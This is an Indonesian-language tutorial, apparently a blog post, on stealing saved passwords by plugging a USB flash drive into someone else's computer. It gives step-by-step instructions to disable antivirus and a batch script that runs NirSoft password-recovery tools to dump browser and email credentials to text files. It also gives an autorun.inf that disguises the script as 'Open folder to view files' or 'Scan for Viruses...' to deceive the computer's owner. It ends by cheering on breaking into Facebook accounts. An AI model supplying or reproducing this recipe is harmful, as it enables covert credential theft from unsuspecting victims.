Mencuri Password Menggunakan USB FlashDisk
Mungkin anda tidak menyangka bahwa media penyimpanan data yang sangat mobile seperti USB
FlashDisk dapat menjadi sebuah media kejahatan yang sangat berbahaya. Saya serius ketika berkata
berbahaya karena USB FlashDisk dapat digunakan sebagai senjata yang sangat efektif oleh para
cracker untuk mencuri password anda tanpa anda ketahui dengan syarat sang cracker dapat
menancapkan USB FlashDisk miliknya ke computer yang tersimpan password.
Dengan alasan tidak ingin repot, kebanyakan orang (termasuk saya) menggunakan password manager
yang disediakan oleh banyak aplikasi, browser internet misalnya. Untuk penggunaan yang sering,
memang fitur “remember me” atau “auto complete password” memang sangat memanjakan, tapi dibalik
kemanjaan itu tersimpan potensi bahaya yang tidak akan menyenangkan bila anda yang jadi korban.
Saya akan memperlihatkan kepada anda.
Pertama kita butuh software yang berfungsi untuk me-recover password. Saya tidak akan meminta
anda untuk membuat sendiri password recoverer kok karena di dunia maya sudah ada banyak sekali
yang mengembangkan aplikasi seperti itu dan GERATIS misalnya http://www.nirsoft.net/. Perlu
diperhatikan bahwa menurut yang punya/pengembang, beberapa antivirus akan memberikan false alarm
untuk tools ini. aku g ikut-ikutan untuk permasalahan yang satu ini *tidak bertanggungjawab mode=ON*
nah!
sekarang kumpulkan sofware2 ini:
IE PassView (Internet Explorer Password View)
IE PassView merupakan password revealer untuk menampilkan password yang tersimpan di Internet
Explorer.
PasswordFox (Mozilla Firefox Password View)
PasswordFox ini memungkinkan anda membaca nama user dan password yang disimpan oleh Mozilla
Firefox. Secara default PasswordFox akan menampilkan username dan password yang tersimpan di
polder Profiles (C:\Documents and Settings\[user name]\Application Data\Mozilla\Firefox\Profiles\tabk8vv1.default), atau anda dapat mengubah direktori ini di menu File-Select Folder. Setelah anda menjalankan PasswordFox maka PasswordFox akan menampilkan informasi seperti : Record Index, Web Site, User Name, Password, User Name Field, Password Field, dan Signons filename.
Mail PassView
Seperti namanya Mail PassView ini bermanfaat untuk menampilkan password dan informasi akun lain.
email clients yang dapat ditampilkan oleh aplikasi berukuran mini ini diantaranya:
• Outlook Express
• Microsoft Outlook 2000 (akun POP3 dan SMTP)
• Microsoft Outlook 2002/2003/2007 (POP3, IMAP, HTTP dan SMTP)
• Windows Mail
• Windows Live Mail
• IncrediMail
• Eudora
• Netscape 6.x/7.x (bila password tidak dienkrip)
• Mozilla Thunderbird (bila password tidak dienkrip)
• Group Mail Free
• Yahoo! Mail (jika password disimpan di aplikasi Yahoo! Messenger)
• Hotmail/MSN mail (jika password disimpan di aplikasi MSN/Windows/Live Messenger)
• Gmail (jika password disimpan oleh Gmail Notifier, Google Desktop, atau Google Talk.
Dialup pass,ChromePass, MessenPass, OperaPassView, dan kawan-kawan. Silakan tambahin sendiri..
Dengan menggunakan tools di atas dan sebuah USB FlashDisk anda dapat membuat sendiri sebuah
rootkit untuk cracking. Keren kan??
Berikut ini adalah langkah-langkah untuk menjadikan USB FlashDisk anda sebagai senjata perampok
password. Demi kelancaran anda perlu mematikan antivirus anda karena kemungkinan false alarm.
Kopi semua file executeable (iepv.exe, mailpv.exe, passwordfox.exe) ke USB FlashDisk anda.
Kemudian buat batch file untuk menjalankan semua aplikasi pencuri password tersebut. Untuk itu
buka notepad dan masukan key berikut:
[code]
start PasswordFox.exe /stext Mozilla Firefox_Password.txt
start iepv.exe /stext Internet Explorer_Password.txt
start mailpv.exe /stext Mail_Password.txt[/code]
Perintah (script) di atas akan menjalankan iepv.exe, mailpv.exe, passwordfox.exe dan mencatat
semua password yang diperoleh ke file teks dengan nama yang anda tentukan, pada contoh “Mozilla
Firefox_Password.txt”
Setelah anda mengetikkan script diatas, simpan notepad sebagai “launch.bat” tanpa tanda petik.
Untuk menjalankan launch.bat secara otomatis saat USB FlashDisk menancap kita membutuhkan file
autorun.inf, untuk itu buka notepad dan buat autorun dengan mengetik script berikut:
[code]
[autorun]
open=launch.bat
shellexecute= launch.bat
action=Open folder to view files
shell\Explore\command= launch.bat
shell\Open\command= launch.bat
shell\Scan for Viruses...\command= launch.bat[/code]
Saya akan menjelaskan arti script di atas. Script tersebut memerintahkan sistem untuk menjalankan
file launch.bat, dan sebagai cadangan dengan script shellexecute kita dapat menjalankan
launch.bat dari pop-up menu autoplay. Dengan mengklik menu “Open folder to view files” sebenarnya
kita telah menjalankan launch.bat, ini untuk menipu si pemilik computer, bila ia ada di sisi anda. Dan sebagai cadangan lagi (duh, saya paranoid sekali) script Shell berguna untuk menambah opsi baru pada menu bar file atau popup ketika anda melakukan klik kanan pada USB FlashDisk. Opsi tambahan itu adalah Explore, Open, Scan for Viruses..., ktiga opsi ini tidak lain dan tidak bukan akan menjalankan file launch.bat milik kita..... :P...
NB: Jika anda berminat anda dapat mengubah file launch.bat menjadi file executeable (launch.exe)
menggunakan BatToExeConverter (http://f2ko.de/)
NB: Untuk parameter printah yang dapat ditambahkan bisa dilihat di file readme.txt yang
disertakan bersama aplikasi atau di website resminya..
NB: Silakan menyebarkan coretan kecilku ini dengan syarat menyertakan nama penulis..wkwkwkwkkwkw...,.....selamat mengobrak abrik FB,....xixixixixi,...........
